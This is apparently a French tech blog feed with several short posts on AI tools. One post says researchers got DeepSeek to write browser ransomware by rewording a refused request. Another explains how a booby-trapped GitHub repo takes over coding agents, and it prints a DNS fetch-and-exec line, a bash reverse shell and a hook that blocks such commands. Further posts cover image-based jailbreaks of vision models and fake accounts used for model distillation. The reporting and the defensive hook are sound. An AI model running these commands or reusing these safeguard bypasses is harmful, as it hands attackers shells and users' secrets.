Vue normale

Il y a de nouveaux articles disponibles, cliquez pour rafraîchir la page.
À partir d’avant-hierKorben

Un ransomware dans le navigateur ? Suffit de demander à DeepSeek

Par : Korben ✨
2 juillet 2026 à 06:51

Dans la série "Qu'est-ce qu'on se marre avec les LLMs", des chercheurs en cybersécurité de Check Point ont tenté une expérience plutôt fun (enfin, je trouve ^^) : Demander à DeepSeek de leur coder un ransomware capable de tourner directement dans le navigateur.

Et bah croyez le ou non mais le machin l'a fait sans broncher ^^ Quand je repense à tout ce foin qu'on vient de vivre avec les américains avec Mythos et Fable 5 d'Anthropic, j'avoue je rigole quand je vois ça.

Alexey Bukhteyev et Pedro Drimel Neto, de l'équipe malware de Check Point, ont récupéré cet échantillon bricolé par l'IA, l'ont un peu peaufiné quand même, et se sont retrouvés avec une arme à 100% fonctionnelle capable de chiffrer tous vos documents depuis Chrome sans rien avoir à installer.

Le code malveillant s'appuie sur la File System Access API, une fonction qui permet à une page web de demander l'accès à un dossier de votre disque. La cible clique sur "autoriser" en pensant retoucher une image sur un site de "AI photo enhancer" bidon, et derrière la page parcourt le dossier ouvert, chiffre son contenu, et laisse une jolie demande de rançon et aucun moyen de récupérer les fichiers originaux.

Et surtout, DeepSeek a été au-delà de leurs attentes en proposant plein de fonctionnalités "cools" en plus à ce ransomware comme du vol de tokens Discord, de numéros de carte, de seed phrases crypto et de l'accès webcam. Mais en y regardant de plus près, les chercheurs ont remarqué que tout ceci avait été halluciné et ne fonctionnait pas vraiment. Le seul truc fonctionnel c'est le chiffrement du dossier qu'ils ont eux-même demandé et autorisé.

L'idée de faire un ransomware dans le navigateur n'est pas nouvelle et d'autres chercheurs l'avaient déjà théorisée à la conférence USENIX Security en 2023 sous le nom de RoB, ("Ransomware over Browsers") mais ce qui change vraiment ici, c'est que sans grandes compétences, n'importe qui peut le faire.

Et c'est là que DeepSeek se distingue de la concurrence. Le modèle refuse bien sûr la demande si vous écrivez le mot "ransomware". Mais les chercheurs sont des petits malins et ont simplement retiré les termes qui fâchent, remplaçant "ransomware" par une formulation plus neutre du style "outil de chiffrement de fichiers". Et voilà, DeepSeek v4 a recraché exactement la même fonctionnalité.

Ce garde-fou s'est vraiment comporté comme un simple filtre anti gros mots, c'est un peu ridicule, surtout que ce n'est pas la première fois que le modèle chinois se fait remarquer côté code douteux , ni la première fois que les IA open source montrent leur face sombre .

Pour vous protéger contre ce genre de ransomware, il faudra donc être très vigilant à l'avenir et vous demander pourquoi tel ou tel site vous demande un accès COMPLET à un dossier plutôt que simplement au fichier dont il a besoin. Et sur Android, ça va être encore plus sensible depuis que Chrome peut donner accès au dossier photos. Bref, dans le doute, refusez...

Source

ZCode - L'app maison de z.ai pour coder avec GLM

Par : Korben ✨
1 juillet 2026 à 22:58

Hier je vous parlais de GLM 5.2 , le modèle open source que j'ai fini par adopter (en partie) pour bosser. Eh bien la team z.ai (le lab chinois anciennement connu sous le nom de Zhipu AI) enchaîne le bon travail et pousse désormais ZCode , leur propre application pour coder avec des agents IA.

C'est une app desktop qui tourne sur Mac, Windows et Linux (en beta pour ce dernier), et elle est pensée pour les tâches qui durent. L'idée, ce sont des Goals que vous fixez, et l'agent planifie, exécute et vérifie son boulot tout seul par étapes, pendant que vous suivez la progression.

Vous avez donc un vrai environnement avec gestionnaire de fichiers, terminal, panneau Git et aperçu du navigateur en direct, ça cause le protocole MCP, ça sait lancer plusieurs agents en parallèle, et vous pouvez même piloter vos tâches à distance depuis WeChat ou Feishu. Et le tout tourne sur le même GLM Coding Plan que le reste de leur écosystème, à partir de 18 dollars par mois.

Si vous me suivez, vous savez déjà que GLM 5.2 se branche directement dans Claude Code, parce que l'API de z.ai est compatible Anthropic. Je vous avais d'ailleurs filé le petit launcher pour ça pas plus tard qu'hier. Mais ce ZCode, c'est surtout une bonne vitrine pour z.ai, afin de nous garder dans leur app plutôt qu'on utilise la concurrence. Quoi qu'il en soit, rien d'obligatoire, faut voir ce ZCode comme une option de plus pour coder à l'aide de l'IA.

L'appli est toute récente et en fouillant leur repo de feedback , je vois que l'app se prend encore des plantages bien douloureux sur Apple Silicon, avec notamment des erreurs qui vous font perdre le travail non sauvegardé et une fenêtre qui reste parfois noire même après avoir relancé l'app. Ça calme un peu pour un truc censé gérer des sessions longues de taf... Mais je pense que ça va rapidement se stabiliser, tant les dev de Z.ai font du bon boulot.

Si vous êtes déjà abonné au GLM Coding Plan, ça ne vous coûtera rien de plus d'essayer histoire de voir si les Goals collent à votre façon de bosser. Et sinon, pour les autres, l'API + votre outil habituel, ça fera tout aussi bien le job.

OpenClaw - L'assistant IA arrive sur iPhone et Android

Par : Korben ✨
1 juillet 2026 à 13:33

Chers amateurs d'OpenClaw, bonne nouvelle, votre outil préféré débarque sur iPhone et Android. Mais contrairement à ce que vous faites d'habitude, pour une fois, je vous conseille de bien lire mon article avant de foncer.

En janvier, je vous faisais découvrir rapidement OpenClaw , un assistant IA personnel et open source qui a beaucoup fait parler de lui. Perso, moi je ne suis pas fan (ni de Hermes) parce que je trouve ça plus pratique de dev mes propres outils plus adaptés et mieux pensés plutôt que de partir sur une solution comme ça. Mais breeef, ce n'est que mon avis.

Maintenant si vous êtes utilisateur d'OpenClaw, vous allez pouvoir lancer ça gratuitement sur votre iOS ou Android . Toutefois, ce ne sont pas des OpenClaw complets embarqués dans une app pour smartphone mais plutôt des appli "compagnons", c'est-à-dire un relais pour un vrai OpenClaw installé sur votre Mac, Linux ou Windows (avec WSL évidemment). L'app mobile ne fait donc que s'y connecter pour que vous puissiez interagir avec.

Ce qui est plutôt bien pensé c'est que l'app utilise les capteurs du téléphone pour par exemple pouvoir envoyer des photos, votre position GPS ou écouter ce que vous lui racontez avec le mode "Talk". Ou tout simplement affiche le Canvas qui est l'interface web dans laquelle l'agent bricole en direct.

Bref, OpenClaw bosse sur votre ordinateur et votre smartphone c'est sa télécommande.

L'app est encore un peu brut de décoffrage avec des petits bugs par ci par là mais ça fonctionne quand même alors on ne va pas se plaindre. Par contre, attention si vous l'utilisez sur des réseaux wifi public... je vous conseille de passer par un VPN ou un Tailscale pour éviter de vous faire maninzemideuler par un script kiddy qui passe par là.

Tout est open source sur GitHub , amusez-vous bien !

Source

Reflect v1.0 - Programmer un humanoïde en une phrase

Par : Korben ✨
1 juillet 2026 à 12:07

Un humanoïde qui traverse un immeuble, appelle l'ascenseur, ouvre un colis avec un outil et range les courses dans un tiroir, tout seul, et sur une seule consigne qui lui est donnée en langage naturel, ce n'est pas de la sorcellerie ! Non, c'est la démo qu'a sortie Flexion Robotics , une startup suisse, qui lance Reflect v1.0, son nouveau "cerveau" IA pour robots.

Car Flexion ne fabrique pas de robots. Cette spin-off zurichoise, fondée en 2024 par d'anciens chercheurs Nvidia, vend du logiciel, une couche d'intelligence qui se pose sur un humanoïde existant et le pilote de bout en bout.

Là où Alibaba donne un corps à son IA avec une suite logicielle complète, Flexion ne vise que le cerveau. Vous écrivez ce que vous voulez en langage naturel, et le robot part faire sa vie pour vous satisfaire au mieux. Vous pouvez même changer la consigne en plein vol, du genre "non, reviens par ici" et il abandonnera tout pour revenir dans vos bras.

En général, en robotique (comme avec les LLMs finalement...), l'autonomie longue sur les tâches, c'est l'enfer. Une mission de 16 étapes, des erreurs qui s'enchaînent et paf, tout s'écroule. Alors pour encaisser ça, ils ont entraîné leur propre modèle de vision-langage, un chef d'orchestre qui surveille, raisonne et replanifie en direct. Et ils ont misé sur l'apprentissage par renforcement à tous les étages, du mouvement fin jusqu'à la décision. Et voilà comment (en labo), ils passent de 38 % à 90 % de réussite sur ce genre de missions longues.

Ensuite côté capacités, c'est du costaud puisqu'on a un robot qui manipule des colis de 100 g à 3,5 kg, repositionne les cartons, appuie sur les boutons d'ascenseur au centimètre près, utilise des outils, enchaîne les escaliers et slalome entre les obstacles avec sa charge. Et quand il rate une prise, s'pas grââve, il retente ou replanifie sa route grâce à ses caméras.

En ce moment, les annonces d'humanoïdes pleuvent en Chine... On a eu par exemple Agibot qui affiche 99 % de succès sur une démo usine de six jours, ShengShu qui présente Motubrain , son cerveau unifié, et ça ne risque pas de s'arrêter, sans parler des robots chinois un peu plus bas de gamme, revendus en marque blanche qui commencent à pulluler comme les aspi robots ou les tondeuses autonomes...

À voir maintenant si l'un d'eux ira un peu trop loin en milieu ouvert... En attendant, Flexion est très honnête puisque la société explique que Reflect v1.0 reste limité à des tâches bien définies, et qu'ils ne sont pas encore prêts pour l'autonomie universelle... pour l'instant.

Source : Interesting Engineering

GLM 5.2 - Le premier modèle IA open source que je garde

Par : Korben ✨
30 juin 2026 à 18:42

Les amis, il faut que je vous parle de GLM 5.2 . Je l'utilise en ce moment même à travers Z.ai, et c'est la première fois qu'un modèle open weights me donne satisfaction sur ce que je lui demande de faire. Et dieu sait que j'en ai testé de ces putains de modèles !

GLM 5.2, c'est le dernier-né de Z.ai, le lab chinois connu avant sous le nom de Zhipu AI. Il est sorti en ce mois-ci (en juin), et c'est un gros bébé avec ses 744 milliards de paramètres en Mixture-of-Experts (MoE), dont à peu près 40 milliards qui s'activent pour chaque token, ainsi qu'une fenêtre de contexte qui monte à 1 million de tokens via la déclinaison glm-5.2[1m]. Le tout publié, comme toujours, sous licence MIT, avec les poids téléchargeables sur HuggingFace.

Bref, j'y croyais pas trop, mais j'ai quand même pris le petit abonnement Z.ai et j'ai lancé mes outils habituels et codé quelques nouvelles features sur mes logiciels. Et Ô surprise, il s'en sort très très bien pour mes usages (je dis bien pour mes usages !). J'ai eu aucun bug, pas de discussion à l'infini qui tourne autour du pot, ni de fin de conversation qui part en caractères chinois comme me faisait souvent Qwen.

Après, le truc chouette, c'est que je l'ai branché directement dans Claude Code. Si ça vous intéresse, je me suis fait un petit launcher spécifique. C'est cadeau :

#!/usr/bin/env bash
export ANTHROPIC_BASE_URL="https://api.z.ai/api/anthropic"
export ANTHROPIC_AUTH_TOKEN=VOTRE_CLE_API
export ANTHROPIC_DEFAULT_SONNET_MODEL="glm-5.2[1m]"
export ANTHROPIC_DEFAULT_OPUS_MODEL="glm-5.2[1m]"
export CLAUDE_CODE_AUTO_COMPACT_WINDOW="1000000"
claude "$@"

Vous le sauvegardez sous le nom de votre choix, par exemple "glm". Puis vous faites un :

chmod +x glm

Et ensuite vous le lancez comme ceci :

./glm

L'idée, c'est que comme l'API de Z.ai est compatible Anthropic, il suffit de pointer Claude Code vers leur endpoint, de glisser votre clé, et il cause à GLM 5.2 comme il causerait à Claude. Mes skills, mes scripts, tout marche pareil, c'est le feu !

Je regrette juste une chose, c'est de ne pas pouvoir le faire tourner en local chez moi. Parce que le bestiau, il est TROP gros. Même raboté et quantifié en 2-bit pour la maison , il vous bouffe dans les 240 Go de RAM. Chez moi, j'ai pas le matos, et vous probablement pas non plus. Donc pour le moment, l'API, c'est la seule porte d'entrée réaliste et abordable.

Que ce soit Qwen, Llama, Kimi, DeepSeek, peu importe ce que j'ai testé en local, pour mes usages un peu chiadés, à chaque fois je suis super déçu. Alors celui-là, pour ce que je lui demande, il tient très bien la route.

Maintenant, je vais pas vous vendre ça non plus comme un Claude Killer mais j'ai quand même trouvé un benchmark qui confirme mon ressenti. Sur le leaderboard Arena.ai dédié au code front-end, GLM 5.2 pointe à la deuxième place, juste derrière Fable 5. Et comme tout ce qui le précède est propriétaire, ça en fait le premier modèle open weights à ce niveau du classement.

Donc c'est pas la meilleure IA du monde, hein, mais c'est la première open source qui me donne un résultat qui me convient. Et vous savez tous à quel point je suis chiant et exigeant avec ce genre d'outil. En tout cas, c'est la première fois que je me dis que l'IA open source pourrait vraiment entrer dans mon flux du quotidien, et pas juste rester un joujou pour classer des trucs ou faire du slop sur des blogs de SEO. Maintenant, entre nous, j'attends surtout que Fable 5, ou son équivalent, revienne mettre le feu !!

Si ça vous tente d'essayer, il y a donc le GLM Coding Plan de Z.ai, qui démarre à 18 dollars par mois et qui est surtout taillé pour le code. Il se branche sur Claude Code, Cline et une vingtaine d'outils du même acabit. Petit conseil au passage, ce lien vers le Plan GLM est un lien affilié certes, mais il vous offre 10 % de réduc si vous l'utilisez, et ça me file un petit truc aussi, donc tout le monde y gagne.

Voilà, si vous codez avec autre chose jusqu'ici, ça vaut le coup d'y jeter un œil par curiosité.

Source : Z.ai

Hugging Face sait enfin vous dire si un modèle tourne sur votre machine

Par : Korben ✨
30 juin 2026 à 18:24

Vous avez une petite carte graphique, un vieux Mac ou juste un bon processeur, et vous cherchez LE modèle d'IA parfait qui pourra tourner en local sans que ça rame ?

Hugging Face vient d'ajouter le filtre qui manquait à sa page Models : un sélecteur de matériel qui ne vous proposera que les modèles réellement compatibles avec votre machine.

Vous renseignez votre config (une RTX 3060, un processeur AMD, une puce Apple Silicon M2…) dans les réglages de votre compte, et le catalogue ne gardera plus que ce qui passe pour un GPU, un CPU ou une puce Apple précis.

Fini l'époque, donc, où il fallait ouvrir chaque fiche, chercher la VRAM requise, sortir la calculette et croiser les doigts au moment du lancement.

Ce filtre d'Hugging Face repose sur la taille des fichiers proposés, notamment les versions quantifiées au format GGUF, ces modèles compressés qui font tourner de grosses IA sur des machines modestes, et sur la RAM ou la VRAM de votre config déclarée. Cette base hardware est constituée de ce que possède réellement la communauté des 300 000 membres qui ont accepté de déclarer leur matériel.

Une fois le bon modèle repéré, vous récupérez les commandes via le bouton "Use this model" présent sur chaque fiche, puis vous lancez tout ça avec les outils habituels de l'IA locale, du genre llama.cpp, Ollama ou LM Studio. Et pour ceux qui veulent aller plus loin sur Apple Silicon, il existe également des serveurs d'inférence maison pour remplacer l'API d'OpenAI par votre propre Mac .

Maintenant, si vous avez un chip un peu exotique, un accélérateur NPU ou une carte à peine sortie, il faudra parfois patienter, voire passer par le forum pour réclamer son ajout dans la base, mais bon, je chipote !

Source

Cursor Mobile - Vos agents de coding pilotés depuis iPhone

Par : Korben ✨
30 juin 2026 à 13:31

Cursor , le célèbre IDE de vibe coding, vient de sortir une app iOS qui permet de piloter des agents IA codant à votre place, directement depuis un smartphone.

Je ne parle donc pas d'écrire du code sur un écran de six pouces, hein, mais bien de lancer une tâche, de la confier à un agent qui bosse tout seul dans le cloud, et de garder un œil dessus pendant que vous êtes dans le métro ou affalé dans le canapé.

Vous lancez l'app, vous tapez ce que vous voulez faire, et un agent part bosser dans sa VM avec son environnement de dev complet. Et vous pouvez comme ça en lancer plusieurs en même temps et suivre leur avancement, même sur l'écran verrouillé sur smartphone. Quand il se retrouve bloqué, l'agent IA vous envoie une notif et quand c'est fini, vous n'avez plus qu'à relire les diffs, à passer en revue les captures écran, à consulter les logs et merger la pull request directement depuis le téléphone.

Je vous laisse avec Benjamin qui va vous expliquer ça (roooh, ça va, j'rigole) :

Y'a aussi un mode "remote control" comme ce qu'on retrouve chez Claude Code , qui récupère un agent déjà lancé sur votre ordi, afin de pouvoir continuer à le piloter à distance. Moi j'utilise souvent ce genre de trucs quand je dois m'absenter pour faire une course, afin de ne pas perdre de temps.

On est, en quelques mois, passé d'un monde où le dev tapait religieusement chaque ligne à un monde où il décrit une "intention" et supervise des agents qui exécutent le taf. Et le clavier devient presque accessoire, surtout avec des outils comme VoxDrop .

L'app est en beta publique, réservée aux plans payants, et pour l'instant c'est iOS uniquement, et Cursor lance aussi une promo de 75% sur les runs Composer 2.5 dans l'app jusqu'au 5 juillet, histoire de vous faire tester tout ça tranquillement.

L'app est dispo sur l' App Store si vous voulez faire du dev depuis vos toilettes.

Source

Un dépôt GitHub trop propre suffit à pirater Claude Code

Par : Korben ✨
30 juin 2026 à 09:18

Les chercheurs Andre Hall et Miller Engelbrecht, du Zero Day Investigative Network de Mozilla (0DIN), viennent de montrer comment prendre le contrôle complet d'une machine avec un dépôt GitHub qui ne contient aucun code malveillant.

Vous clonez le repo, vous demandez à Claude Code de "faire tourner le projet", et trente secondes plus tard un inconnu obtient un accès shell sur votre poste, avec vos clés API et tous vos secrets en cadeau Bonux !

Le pire, c'est que la faille n'est pas réellement dans Claude Code mais plutôt dans la serviabilité du modèle.

Le dépôt utilisé par les chercheurs pour leurs tests, se présente comme "Axiom", un faux outil de déploiement cloud avec un README propre et des instructions banales : pip3 install -r requirements.txt puis python3 -m axiom init.

Le package Python est conçu pour refuser de démarrer tant qu'il n'est pas initialisé, donc quand l'agent essaie de lancer l'appli, il se prend un RuntimeError parfaitement normal qui lui dit gentiment "lance python3 -m axiom init". Et l'agent, en bon élève, lit le message d'erreur et exécute la commande de récupération tout seul. Sauf que cette commande déclenche scripts/setup.sh, qui lui, va chercher sa vraie charge utile ailleurs.

Et ailleurs, ça veut dire dans le DNS puisque le script fait ça :

cfg=$(dig +short TXT _axiom-config.m100.cloud @1.1.1.1 | tr -d '"')
[ -n "$cfg" ] && bash -c "$cfg"

En fait, ça résout un enregistrement TXT contrôlé par l'attaquant, récupère une chaîne en base64, la décode et l'exécute. Et au bout, ce qu'on retrouve, c'est un classique reverse shell bash -i >& /dev/tcp/IP-attaquant/4443 0>&1 qui ouvre un terminal interactif tournant sous votre propre compte utilisateur.

À partir de là, tout ce que vous pouvez faire, l'attaquant le peut aussi : lire vos fichiers .env, siphonner ANTHROPIC_API_KEY, AWS_SECRET_ACCESS_KEY, GITHUB_TOKEN, planter une clé SSH ou un cron pour rester au chaud.

C'est un principe de poupées russes, ce qui fait que l'analyse statique du repo ne voit qu'une résolution DNS, que le monitoring réseau n'enregistre qu'une banale requête de nom et que l'agent IA, lui, croit exécuter une étape de setup déjà validée. Aucun système de sécurité ne regarde les trois ensemble. Et cerise sur le gâteau, le payload est interchangeable... Suffit à l'attaquant de mettre à jour son enregistrement DNS et de changer ce que la prochaine victime exécute, sans jamais toucher au dépôt.

L'attaque ne vise d'ailleurs pas que Claude Code. 0DIN a vérifié que Cursor et Gemini CLI tombent dans le même panneau, parce que le piège exploite un comportement commun à tous les agents codeurs : ils lisent les erreurs et tentent de les corriger seuls. On est dans la lignée de cette bibliothèque Java qui piégeait les IA codeuses , sauf qu'ici on passe du sabotage à la prise de contrôle totale. Et ça arrive après les deux failles du bac à sable de Claude Code donc autant dire que la surface d'attaque des agents s'élargit à vue d'œil.

Pour vous protéger, le réflexe de base est simple : un script de setup dans un repo que vous ne connaissez pas, c'est du code non approuvé, point. Vous le lisez avant, ou vous le lancez dans un conteneur jetable sans vos secrets dans l'environnement.

Mais on peut faire mieux que de juste rester vigilant. Moi j'ai mis en place différents outils qui utilisent le hook PreToolUse de Claude Code qui inspecte notamment chaque commande avant qu'elle ne soit lancée et la refuse si elle sent le fetch-and-exec. Voici comment faire. Étape 1, vous créez un petit ~/.claude/hooks/block-fetch-exec.sh :

#!/usr/bin/env bash
input=$(cat)
cmd=$(printf '%s' "$input" | jq -r '.tool_input.command // ""')
if printf '%s' "$cmd" | grep -Eq '(curl|wget|dig|nslookup)[^|]*\|[[:space:]]*(bash|sh|zsh|python3?)'; then
jq -n '{
hookSpecificOutput: {
hookEventName: "PreToolUse",
permissionDecision: "deny",
permissionDecisionReason: "Bloqué : fetch-and-exec détecté."
}
}'
else
exit 0
fi

Vous le rendez exécutable avec chmod +x, puis vous le déclarez dans ~/.claude/settings.json et c'est plié :

{
"hooks": {
"PreToolUse": [
{ "matcher": "Bash", "hooks": [
{ "type": "command", "command": "$HOME/.claude/hooks/block-fetch-exec.sh" }
]}
]
}
}

À partir de là, tout curl ... | bash ou dig ... | bash se fait jeter avant de s'exécuter. Attention quand même, un hook ne voit que la commande de surface. Comme le python3 -m axiom init de l'attaque planque son dig | bash à l'intérieur, ce filet-là ne l'attrape pas tout seul. C'est pour ça que le vrai pare-feu reste la meilleure des isolation.

Un outil comme LuLu (gratuit et open source) qui vous alerte sur les connexions sortantes inattendues, ou carrément faire tourner l'agent dans un conteneur jetable c'est le top ! Comme ça, même si la commande du reverse shell part, ce dernier n'arrivera jamais à joindre son serveur.

Ce qui serait l'idéal, c'est que les agents montrent d'eux-mêmes ce qu'une commande de setup va réellement exécuter, y compris le contenu de tout script qu'elle invoque et tout ce que ce script récupère à l'exécution. En attendant, méfiez-vous des dépôts un peu trop propres, c'est peut-être un appât.

Source : 0DIN (Mozilla Zero Day Investigative Network)

JaiLIP - L'image piégée qui débride les IA qui voient

Par : Korben ✨
28 juin 2026 à 08:19

Md Jueal Mia et Hadi Amini, deux chercheurs de Florida International University , ont mis au point une méthode qu'ils ont baptisée JaiLIP qui permet de forger une image capable de contourner les garde-fous des LLM pour les jailbreaker.

Pour cela, ils utilisent 2 techniques en simultanée. La première dit à l'image "reste identique à l'originale, qu'aucun humain ne voie la moindre différence" et la seconde dit "pousse le modèle à cracher la réponse interdite". Ainsi, en poussant ces 2 curseurs d'un coup, ils obtiennent une photo qui au premier abord a l'air normale mais qui fait dérailler les modèles IA.

Vous, vous repérez un chat, des contours, une scène et vous lui courez derrière pour lui faire des papouilles. L'IA, elle voit une grille de chiffres et des corrélations entre pixels. Du coup sa vie est nulle mais surtout, une retouche minuscule, totalement invisible à votre œil, suffit à déplacer ce qu'elle comprend de l'image.

Sur leurs tests, l'image trafiquée a quasiment doublé la part de réponses dangereuses par rapport à la même image laissée intacte, la toxicité étant mesurée avec des outils standards du domaine. Dans l'un de leurs exemples, ils ont trafiqué une image de signalisation routière qui a permis au modèle ensuite d'expliquer OKLM comment ignorer les règles de circulation et éviter les PV.

Les chercheurs ont testé l'attaque sur deux modèles vision-langage open source, BLIP-2 et MiniGPT-4. GPT-4V, Gemini et les autres gros modèles fermés, eux, n'ont pas été testés dans l'étude. Donc non, contrairement à ce que j'ai pu lire par ci et par là, ce n'est pas une faille prouvée dans ChatGPT ou peu importe l'assistant IA que vous utilisez tous les jours.

Et tromper une IA avec une image bricolée, ça existe depuis une bonne dizaine d'années. Mais la nouveauté de JaiLIP, c'est surtout sa recette d'optimisation. En jouant sur les deux pertes à la fois, l'image reste plus discrète à l'œil tout en se montrant un cran plus efficace que les bidouilles précédentes.

Et ce genre de détournement nous concerne tous parce que des modèles qui regardent des images, il y en a partout maintenant. Les agents IA qui bossent à partir de captures d'écran, les assistants à qui vous balancez vos photos, sans oublier la modération automatique qui trie les images avant publication. À cause de ça, l'image est dorénavant un canal d'attaque, exactement comme l'était déjà le texte...

On l'a vu avec le son inaudible qui pirate les assistants vocaux , on l'a vu avec les IA qu'on manipule sans qu'elles s'en aperçoivent , et c'est toujours la même logique qui revient. Ce n'est pas parce qu'en tant qu'humain, nous ne percevons rien, que l'IA elle n'est pas capable de capter le message 5/5.

Le cousin de cette attaque, côté perception, c'est par exemple le sticker qui trompe une voiture autonome . Et côté parade, nos chercheurs esquissent une piste légère : virer au hasard 10 à 30% des mots passés en entrée, histoire de casser l'attaque sans réentraîner le modèle.

Prometteur d'après eux, mais c'est pas encore une solution blindée. Pour le reste, leurs conseils tiennent du bon sens : Ne passez pas d'infos sensibles en image à un modèle, limitez qui peut envoyer des images à vos systèmes, et auditez sérieusement la sécurité avant de mettre un VLM en prod.

C'est pas le graal mais c'est mieux que rien. Bref méfiez vous des images que vous donnez à vos IA. On ne sait jamais.

Source : le papier JaiLIP sur arXiv

Dream Server - Un serveur IA complet chez vous en une commande

Par : Korben ✨
26 juin 2026 à 16:41

Monter une vraie IA à la maison, c'est vite une galère. Vous achetez une super machine puis vous collez dessus toute votre liste au père Noël (Chat local, reco vocale, génération d'image, RAG et compagnie) et vous voilà à empiler des dockers à n'en plus finir. Eh bien Light Heart Labs en a eu marre de ces bricolages et nous a pondu Dream Server, un outil qui câble tout ce petit monde à votre place !

Une seule commande et c'est parti mon kiki (Linux et macOS) :

curl -fsSL https://raw.githubusercontent.com/Light-Heart-Labs/DreamServer/main/dream-server/get-dream-server.sh | bash

Ou Windows :

Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass
git clone https://github.com/Light-Heart-Labs/DreamServer.git
cd DreamServer
.\install.ps1

Ça va lancer le script qui va ensuite tout paramétrer tout seul et choisir le modèle d'IA qui collera le plus à votre matériel, et cela que vous ayez une RTX 4090, un Mac M4 avec mémoire unifiée ou encore une puce AMD Strix Halo voire un vieux PC sans GPU.

Edit : un lecteur m'a remonté un piège si vous êtes sous Linux configuré en français (ou n'importe quelle locale qui écrit les décimales avec une virgule). Le script génère tout seul les valeurs de votre fichier .env en suivant le format de nombres de votre système, et il vous colle des 16,0 au lieu de 16.0. Du coup l'install se vautre avec une erreur dans le genre COMFYUI_CPU_LIMIT: expected number, got '16,0'. La parade, confirmée par un des auteurs, c'est de relancer l'installeur en forçant la locale C (celle qui met des points à la place des virgules) :

LC_ALL=C ./install.sh

Ensuite, pendant que le LLM se télécharge à fond les ballons, un autre petit modèle de 1,5 milliards de paramètres en backup afin que vous puissiez quand même "discuter" avec votre Dreamserver.

Le rôle de Dreamserver c'est donc juste de prendre toutes les briques de l'IA pour vous en faire un truc clé en main. Open WebUI pour le chat, llama-server pour l'inférence, Whisper et Kokoro pour la voix, ComfyUI pour les images, Qdrant pour le RAG, SearXNG pour la recherche web sans mouchard, et bien sûr n8n pour brancher tout ça à vos automatisations.

Et une fois que c'est en route, suffit de lancer la commande dream et là vous pourrez tout faire.

Par exemple dream status pour visualiser l'état des services et du GPU, dream model swap T3 pour changer de "palier" sur votre matos, dream enable n8n pour activer une extension ou encore dream mode hybrid pour avoir de l'inférence en local avec possibilité de basculer sur une IA dans le cloud via une API.

Dreamserver reste un orchestrateur, et pas un moteur IA magique, donc si vous adorez tout assembler vous-même, vous n'avez clairement pas besoin de ça. Par contre, si vous vous en foutez, et que vous voulez juste votre IA qui tourne ce soir, ça vous fera gagner des heures de bidouille.

Faut dire qu'à mesure que l'IA devient une infrastructure de base, dépendre à 100% d'un abonnement cloud qui peut tripler ses tarifs ou couper votre accès du jour au lendemain, ça craint un peu. Donc je pense qu'on est tous bien contents d'avoir des solutions clé en main comme celle-ci.

Si ça vous tente, c'est sur le dépôt de Dream Server .

Distillation - Comment Alibaba aurait aspiré l'IA Claude

Par : Korben ✨
25 juin 2026 à 09:24

Anthropic vient d'accuser frontalement Alibaba d'avoir siphonné les capacités de son IA Claude. Et le plus dingue dans cette histoire, c'est la méthode qui aurait été employée.

Car non, rassurez-vous, personne n'a piraté les serveurs d'Anthropic, personne n'a volé le code source de Claude, et personne n'a mis la main sur les fameux "poids" du modèle. En fait, les opérateurs (les bots quoi) liés à Alibaba ont juste discuté avec Claude. Et pas qu'un peu puisqu'ils ont effectué 28,8 millions d'échanges durant 6 semaines !!

Alors vous demandez sûrement comment on "vole" une IA juste en lui causant ? Hé bien c'est une technique qui s'appelle la distillation et que je vais essayer de vous expliquer.

En fait, quand vous posez une question à Claude, il vous sort en général une réponse super bien formulée et complète. Et cette réponse, c'est de l'or en barre pour les copieurs car elle contient, en version condensée, le savoir et le raisonnement du modèle. Du coup, si vous récupérez des millions de ces paires question-réponse, vous vous retrouvez au bout d'un moment avec un énorme jeu de données. Et avec ce jeu de données, vous pouvez alors entraîner votre propre modèle, plus petit, à imiter les réponses du plus balèze.

En gros, le modèle costaud joue le prof, et votre petit modèle joue l'élève. Ce dernier ne pige pas forcément comment le prof réfléchit, mais à force de recopier tout ce que l'autre lui dit, il finit par lui ressembler beaucoup. Les chercheurs appellent ça la technique du teacher-student et la variante utilisée ici chez Alibaba, c'est la distillation "black-box". En mode black-box (boite noire quoi...), y'a pas besoin de cracker le modèle puisque ses réponses suffisent. Et c'est pour ça que ça marche même quand le modèle d'en face est fermé et accessible seulement via une API.

Reste un petit détail quand même... Y'a aucune API au monde qui vous laisse balancer 28 millions de requêtes peinard depuis un seul compte. Y'a des quotas, des limites, des systèmes anti-abus de partout. Ils ont donc dû créer environ 25 000 faux comptes pour noyer le poisson, comme ça chaque compte fait sa petite part du boulot, le trafic ressemble à des milliers d'utilisateurs lambda, et hop, ni vu ni connu on chope la data ! C'est ce maquillage à grande échelle qui fait dire à Anthropic que c'est la plus grosse attaque du genre qu'ils aient jamais vue, et menée selon eux par des opérateurs liés à Alibaba et à son labo Qwen .

Et c'est loin d'être la première fois, souvenez-vous, puisqu'en février, Anthropic avait déjà repéré le même manège chez DeepSeek (150 000 échanges), Moonshot AI (3,4 millions) et MiniMax (13 millions). Avant ça, début 2025, OpenAI soupçonnait aussi déjà DeepSeek de piocher dans les réponses de ses modèles, et décrivait des routeurs tiers planqués pour contourner ses blocages. Bref, c'est toujours le même schéma. Le copiage d'IA a même ses variantes maison, comme on l'a vu lors de ce scandale Pangu chez Huawei , qui lui est resté entre acteurs chinois.

Et le vrai souci pour Anthropic, OpenAI et les autres, c'est qu'ils ne peuvent quasiment rien y faire. Une IA, son produit, c'est justement ses réponses. Vous ne pouvez donc pas vendre des réponses tout en empêchant les gens de les lire et de les stocker. Les labos planchent bien sur des parades (watermarking des sorties, réécriture des traces de raisonnement pour brouiller les pistes, ce genre de trucs), mais pour l'instant ça reste de la rustine de fortune.

Après faut pas croire non plus que la distillation soit "sale" par nature. C'est une technique hyper courante et parfaitement légit pour fabriquer des petits modèles rapides qui tournent sur votre laptop. Mais ce qui change tout ici, c'est le consentement car distiller votre propre gros modèle, nickel mais distiller celui du voisin en douce via des faux comptes, c'est moche quand même.

Maintenant, moi ce que je n'oublie pas c'est que ces modèles géants se sont gavés en avalant la totalité du web sans rien demander à personne, alors les voir se faire pomper à leur tour pour finir dans des modèles open source, je vois ça comme un juste retour de karma...

Reste à voir ce que les tribunaux en penseront...

Source

EQ-Bench - Le benchmark de l'intelligence émotionnelle des IA

Par : Korben ✨
19 juin 2026 à 12:01

Sam Paech s'est rendu compte qu'on testait toujours les IA sur le code, les maths, et à qui battra un prochain record , mais presque jamais sur leur capacité à comprendre les émotions humaines ou à pondre un texte qui ne sente pas le slop de bot à plein nez. Et c'est pour ça qu'il a monté EQ-Bench , un benchmark qui note l**'intelligence émotionnelle des grands modèles de langage**.

